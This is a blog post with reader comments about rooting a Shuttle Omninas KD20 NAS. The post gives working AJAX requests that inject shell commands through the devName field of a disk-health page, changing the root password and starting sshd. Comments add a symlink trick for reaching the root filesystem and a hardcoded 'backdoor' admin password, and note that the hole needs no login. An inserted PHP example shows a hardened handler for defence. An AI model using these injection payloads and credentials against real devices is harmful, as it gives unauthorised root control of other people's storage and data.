
04 Dec 13 Getting root (and SSHD on boot) with the Shuttle Omninas KD20

I recently picked up a Shuttle Omninas KD20 on sale from NCIX. It runs Linux, but sshd is disabled by default. Thankfully it wasn’t too difficult to break into.

The Storage -> Disk Manager page has an info button that calls smartctl -a.  It doesn’t check parameters passed by the page :)

With the Disk Manager page loaded, open your Web Developer Console and run the following JavaScript commands:

(pastebin text version; thanks to scotty86 for the paste)

Change the root password:

$.ajax({
    type: "POST",
    url: 'http://192.168.1.93/action/healthy_action.php',
    cache: false,
    //data: "devName=sda"+$devName,
    data: "devName=/dev/sd; (echo \"foobar\nfoobar\n\" | sudo passwd root) ",
    success: function(data) {
        console.log(data)
    }
});

Start sshd:

$.ajax({
    type: "POST",
    url: 'http://192.168.1.93/action/healthy_action.php',
    cache: false,
    //data: "devName=sda"+$devName,
    data: "devName=/dev/sd; sudo /etc/rc.d/sshd.sh start",
    success: function(data) {
        console.log(data)
    }
});

With that out of the way I was able to log in to the NAS, and have sshd start on bootup by editing /etc/rc.

login as: root
[email protected]′s password:
BusyBox v1.10.3 (2013-11-06 11:05:30 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

OMNINAS-XYZZY> df
Filesystem 1k-blocks Used Available Use% Mounted on
/dev/ram0 15863 2134 13729 13% /initrd
/dev/md0 201556 372 190948 0% /system
/dev/md1 1463634048 27294636 1436339412 2% /share/atonnas
OMNINAS-XYZZY> cd /proc/
OMNINAS-XYZZY> cat cpuinfo
Processor : ARMv6-compatible processor rev 5 (v6l)
processor : 0
BogoMIPS : 299.00

processor : 1
BogoMIPS : 299.82

Features : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xb02
CPU revision : 5

Hardware : Oxsemi NAS
Revision : 0000
Serial : 0000000000000000
OMNINAS-XYZZY>

Yay!

It would be nice if Shuttle just enabled ssh by default though.  Pretty please?

 

Reader's Comments

  1.    

    What version of the firmware was this done to?

    I can not seem to replicate this.

  2.    

    May I inquire as to what version of the firmware you achieved this hack with?

    I’m not having any success attempting this procedure.

  3.    

    Hello,

    thanks for the great tutorial to get sshd to run. I’ve managed to run both javascripts successfully, but when it comes to login via ssh, I get “ACCESS DENIED” errors and I don’t know what to do now …

    These are the messages with activated logging:
    Incoming packet #0x7, type 51 / 0x33 (SSH2_MSG_USERAUTH_FAILURE)
    Event Log: Password authentication failed

    Perhaps you can help me once more …? Which password do I need to provide? I’ve tried already with my admin user’s password and user “root”, but I can’t login successfully.

    Please help me once more, to get more out of this NAS.

    Thank you very much!

  4.    

    Hey!

    Thanks a lot, I’ve managed to get into my NAS via SSH!

    Afterwards I tried your advice editing /etc/rc to start SSHd at startup, but I can’t get it to work.
    Which file do I have to edit and what are the exact changes to the file?

    Furthermore I’d like to add “strict allocate = yes” to smb.conf in order to get some problems fixed when copying data to the NAS using robocopy. When I edit this file in /initrd/etc/samba/smb.conf and reboot, the changes are gone.

    Would you please help me once more?

    Thank you and greetings!

  5.    

    Hello,

    another time I have to say: Thank you! I’ve got SSH to work on startup.

    Regarding the parameter in smb.conf I didn’t get any new findings. I can find two smb.conf files, one in initrd/etc/samba and the other one somewhere in the hddapp directory. Every change in each of them is gone after a reboot. If you’re able to find out why that happens and what can be done, I would be very happy.

    Thank you and greetings

  6.    

    I got :

    /*
    Exception: illegal character
    */

    Can you help me ?

  7.    

    Current Firmware Version : 2.34.20131121

  8.    

    Downgrade to 2.33.20130918. Now it says:

    SyntaxError: Unexpected token ILLEGAL

  9.    

    Hello,

    I have another question. Are there any chances getting Wake on LAN to work somehow?

    This would be another interesting feature.

    Thanks and greetings

  10.    

    Hello,

    I have another question: is there any chance to get wake on lan working on a KD20? This would be another nice feature. I know that the KD21 does support it, perhaps it’s also possible on a KD20 …

    Thanks and greetings!

  11.    

    Great job, sir!

    Works perfectly on the newest firmware, too. (2.35.20140102)

    If you get an illegal sign- or syntax-error, it’s because of the quotes.. I made a proper pastebin for the first two ajax commands:
    http://pastebin.com/WRdP19PM

  12.    

    Damnit :O
    You don’t even have to be logged in to your NAS and you can execute commands as sudoer by the web console or manual post-requests. Therefore it’s a good idea to block any communication from the NAS and the internet.

  13.    

    Hey guys,

    Thanks for this method. I can confirm that the vulnerability still exists in the latest firmware (2.35).

    Just my 2c.

    Cheers and happy hacking :)

    •    

      I want to add that it is indeed a good idea to put a firewall in front of the NAS, so no connections can be made from outside. I also don’t think you should use the AjaXplorer (haven’t researched it yet, will do soon). For prevention, please block ALL connections to your NAS from the internet.

  14.    

    Thanks for this hack.

    How are you editing your rc file?

    There’s no pico, nano or gedit. I found vi, but…I will do more harm than good with that…

  15.    

    I wanted a way to be able to manage the two internal hard drives separately (rather than having them lumped together under JBOD). As I have a 4 GB and a 1 GB, the RAID options weren’t going to work for me either. This is a bit of a kludge, it creates a symbolic link in the folder that is shared by default to the second hard drive.

    1) Enable SSH (See original post)
    2) Change root password (See original post)
    3) Insert first hard drive, configure in single drive mode.
    4) Shutdown the NAS.
    5) Insert second hard drive, power on.
    6) Login using PuTTY
    7) Run: fdisk -l
    8) Find the filesystem name of the second hard drive (typically /dev/sdb1) and make a note of it.
    9) Use fdisk /dev/sdb1 to create the partition if necessary.
    10) Use mkfs.xfs /dev/sdb1 to format the hard drive.
    11) Change directory to /mnt/
    12) mkdir sdb1 (Note: You can change sdb1 to be anything you want, just remember it and be sure to change it whenever /mnt/sdb1 is referenced)
    13) Fix permissions to allow full access to everyone by running the following commands (each line separately):
    find /mnt/sdb1 -exec chown root.nobody {} \;
    find /mnt/sdb1 -type d -exec chmod 0777 {} \;
    find /mnt/sdb1 -type f -exec chmod 0666 {} \;
    14) Change directory to /etc/
    15) Edit /etc/rc
    16) Add the following lines to the bottom of the configuration right above exit 0. The line running sshd.sh is optional but recommended (it will restart SSH on reboot).
    /etc/rc.d/sshd.sh start
    mount /dev/sdb1 /mnt/sdb1
    ln -s /mnt/sdb1/ /share/atonnas/disk/

    •    

      What would be the function of the last line? You cannot link two file systems to the same filename, can you?

      The first disk will be already linked to /share/atonnas/disk in step 3.

  16.    

    Very funny.
    Passwords are in clear text in this file…
    /system/etc/nas_conf_db.xml

    You can play with the network shares in this file.

    Anybody find a smb.conf somewhere?

  17.    

    FYI on firmware 2.36.20140305 /etc/rc is now /etc/rc.local

    •    

      So you managed to SSH into the NAS with the 2.36.20140305 firmware? Could you help me out?

      The two healthy_action.php calls to change the root password and the starting of sshd seemed to have gone through but when I try to PuTTy to the NAS it always gives me a Network Error: Connection refused. Any ideas?

    •    

      I tried to root KD20 with the latest firmware 2.36.20140305 but I have no success so I downgraded to 2.35.20140102.

      Can someone confirm if the vulnerability is no longer available in 2.36.20140305 ?

    •    

      So data: "devName=/dev/sd; sudo /etc/rc.d/sshd.sh start"
      is now: "devName=/dev/sd; sudo /etc/rc.local/sshd.sh start"?

      I just updated my firmware to 2.36.20140305 and am unable to get this to work.

    •    

      Hi,

      I’ve upgraded to firmware 2.36.20140305, but I’m not able to activate SSH again. After the upgrade completed, SSH wasn’t available anymore and trying to reactivate it using the procedure described in the first post, nothing happens and PUTTY says “Network error: Connection refused”. Is there a known problem in getting SSH to work in firmware 2.36?

      Thank you and regards

  18.    

    I had this hack working in 2.35, but when I updated today to firmware 2.36.20140305, it did not work any more :-(

    Anybody still got this working without downgrading to an earlier version?

    One of these days I want to put in a second disk, but without the JBOD hassle, just two separate disks. It seems I need root access and a terminal into the Omninas to do this.

    Paai

  19.    

    BTW: When I paste the ajax commands into the web console, the machine answers ‘[object Object]’. As I don’t speak javascript, I do not know what it means.

    Paai

  20.    

    As I said, I repeatedly tried to get root to version 2.36.20140305. When I paste the commands to the webconsole in mozilla on an Ubuntu machine, the reaction is as pasted below for both commands

    09:01:34.051 [object XMLHttpRequest]
    09:01:34.085 POST http://192.168.178.17/action/healthy_action.php [HTTP/1.1 200 OK 456ms]
    09:01:34.516 ""
    09:01:38.928 GET http://192.168.178.17/template/disk_manager.php

    Yesterday I already posted a report on failure, but it seems the message did not make it to the message board.

    I would very much appreciate any help to get this fixed.

    paai

  21.    

    Did anybody find out how you can enable FTP? Would be awesome for my situation :)

    Thanks!

  22.    

    Hey, I installed optware on my kd20, it seems to work ok.
    Here’s what I did.

    (from: http://www.nslu2-linux.org/wiki/Optware/HomePage/)

    # mkdir /share/atonnas/disk/opt
    # ln -s /share/atonnas/disk/opt /opt

    # feed=http://ipkg.nslu2-linux.org/feeds/optware/cs08q1armel/cross/unstable
    # ipk_name=`wget -qO- $feed/Packages | awk '/^Filename: ipkg-opt/ {print $2}'`
    # wget $feed/$ipk_name
    # tar -xOvzf $ipk_name ./data.tar.gz | tar -C / -xzvf -
    # mkdir -p /opt/etc/ipkg
    # echo "src cross $feed" > /opt/etc/ipkg/feeds.conf

    # export PATH=/opt/bin:$PATH
    # ipkg update

    but the update doesn’t work, because of the --passive-ftp

    /usr/bin/wget: invalid option -- -

    so, I create a new /opt/bin/wget script with these two lines

    ARGS=$(echo $*|sed 's/--passive-ftp//')
    /usr/bin/wget $ARGS

    now ipkg update should work, and then

    # ipkg install nano less

    oups, another problem, “head” not found, “sort” not found… these two are in the coreutils package, so

    # ipkg install coreutils

    but this will generate many “update-alternatives” (symlink) errors, that’s ok for now…

    # cp /opt/bin/coreutils-head /usr/bin/head
    # cp /opt/bin/coreutils-sort /usr/bin/sort

    remove and reinstall coreutils, this time, with the head+sort in /usr/bin, “update-alternatives” should work and the symlinks should be ok.

    # ipkg remove coreutils
    # ipkg install coreutils

    now ipkg install less should work

    # ipkg install less
    # ipkg list | less

    and you can rm /usr/bin/head and /usr/bin/sort if you want.

  23.    

    A completely noob question, but is there any way to install custom firmware on it? Like freenas?

    My main issue, I am missing functionality to run torrent client simultaneously with media server, and FTP server.

    It would be really great to have some modern features.

  24.    

    It’s unfortunate that I have to resort to using SSH to selectively copy files from a hard drive connected to the USB 3 port to the NAS.

  25.    

    anyone try to run sshd on 2.38 firmware?

  26.    

    Hello

    I was trying to login to 2.38 firmware, but with no luck for now. But I was able to extract filesystem from firmware.
    If someone wants to help, I’ve uploaded original filesystems here:
    http://robi.glut.ga/rootfs2.35.tar.gz
    http://robi.glut.ga/rootfs2.38.tar.gz

    The original hack won’t work for sure. File healthy_action.php has been protected:


    $disks = dm_get_disk_properties("high","all");

    foreach ($disks as $disk)
    {
        if ( $disk['blockdev'] == $_POST['devName']) {
            $msg = shell_exec('sudo smartctl -d ata -a '. $disk['blockdev']);
            echo $msg;
            exit();
        }
    }

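The check quoted in the comment above, set beside the unchecked pattern the original post relied on, as an added PHP example (not code from the firmware, the post author or any commenter). The shape of the pre-2.38 handler is an assumption, `list_disks()`, `smart_unchecked()` and `smart_checked()` are hypothetical names, and `/bin/echo` stands in for `sudo smartctl` so the script is harmless to run. It goes beyond the quoted check by comparing strictly, rejecting non-string input and running the command without a shell.

```php
<?php
// Added example, not Shuttle's code. /bin/echo stands in for
// "sudo smartctl -d ata -a" so nothing touches a real disk.

// Constructed stand-in for the firmware's dm_get_disk_properties("high","all").
function list_disks(): array
{
    return [['blockdev' => '/dev/sda'], ['blockdev' => '/dev/sdb']];
}

// Assumed shape of the pre-2.38 handler: input concatenated into a shell line.
function smart_unchecked(string $devName): string
{
    return (string) shell_exec('/bin/echo smartctl -a ' . $devName);
}

// Hardened: exact match against enumerated disks, then argv execution.
function smart_checked($devName): ?string
{
    if (!is_string($devName)) {
        return null;                    // devName[]=x arrives as an array
    }
    foreach (list_disks() as $disk) {
        if ($disk['blockdev'] !== $devName) {
            continue;
        }
        // Array form (PHP >= 7.4) starts the program without a shell,
        // and only the enumerated value is passed, never the request value.
        $argv = ['/bin/echo', 'smartctl', '-d', 'ata', '-a', $disk['blockdev']];
        $proc = proc_open($argv, [1 => ['pipe', 'w']], $pipes);
        if (!is_resource($proc)) {
            return null;
        }
        $out = stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        proc_close($proc);
        return $out;
    }
    return null;                        // unknown device: run nothing
}

// Constructed input: a harmless second command after the separator.
$payload = '/dev/sd; /bin/echo INJECTED';
echo "unchecked:\n", smart_unchecked($payload);
echo "checked, payload:\n";
var_dump(smart_checked($payload));
echo "checked, array input:\n";
var_dump(smart_checked(['/dev/sda']));
echo "checked, known disk:\n", smart_checked('/dev/sda');
```

On PHP older than 7.4, where `proc_open()` takes only a command string, wrapping the enumerated value in `escapeshellarg()` is the fallback.
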
  27.    

    Just to share with you guys:
    This hack does NOT work on firmware v2.38 !!

    It’s really a shame we have to do these kinds of hacks just to get SSH working on a NAS… SSH is basic functionality of any NAS if you ask me.

    @ShuttleLabs please enable SSH for the owners of KD20.

  28.    

    Actually this procedure to activate sshd has been obsoleted, the latest firmware has been fixed to close the “security hole” which was used by this page.
    If you can get the older firmware, it could be available. However, upgrading firmware means overwriting the sshd configuration, it would not be available after upgrading the firmware.

  29.    

    For Root on the latest FW (OMNINAS-7821_2.38.20140728.TAR.GZ) …

    1) Install Vulnerable FW eg. OMNINAS-7821_2.35.20140102.TAR.GZ

    2) Execute rooting procedure from above.
    The important piece is the creation of a user account with known password and shell (root user in this case).

    3) Start and verify SSHD http:///admin/ssh.php
    The above requires a session cookie for ‘aton_nas_ssh’

    4) If OK, reflash latest FW and execute step 3 to re-enable SSH.

    Hope this helps someone.
    - Semmy

  30.    

    or =)

    1) Create user account
    2) Create user share
    3) Create a symlink pointing to the root. Eg. “ln -s / ./my_root”
    4) Connect to the share and upload the root symlink created above
    5) point your browser to “http://your_omninas/admin/ssh.php”, select the SSH check box and click Save to launch the SSHD. (requires a session cookie for ‘aton_nas_ssh’)
    6) point your browser to “http://your_omninas/filesystem/index.php”
    7) login, browse to the share created in step 2, click on the symlink uploaded in step 4.

    You should now be on the ‘/’ of the NAS FS. From here you could replace the /etc/passwd file with one where you know the root password from or upload your own scripts to ‘/usr/htdocs/’ to reset the root password.

  31.    

    Instead of creating a cookie to access /admin, you can use user “atonnas” password “backdoor”.

